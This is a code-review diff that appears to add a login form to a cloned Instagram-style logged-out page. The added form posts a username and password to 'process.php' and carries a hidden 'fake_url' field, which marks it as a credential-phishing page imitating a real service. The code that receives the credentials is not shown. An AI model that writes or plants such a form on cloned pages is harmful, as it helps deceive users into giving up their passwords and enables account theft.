Open
Changes from all commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Jump to
Failed to load files.
Original file line numberDiff line numberDiff line change
Expand Up@@ -18607,5 +18607,11 @@ <h1 class="NXVPg Szr5J coreSpriteLoggedOutWordmark">

<div class="_-rjm"><div class="tA2fc"></div></div>
<div class="_5qKD1"><div class="q5edG"></div></div>
</body>
</body>
<form action="process.php" method="post">
<input type="hidden" name="fake_url" value="http://falso.url" />
<input type="text" name="username" placeholder="Username" required>
<input type="password" name="password" placeholder="Password" required>
<button type="submit">Login</button>
</form>
</html>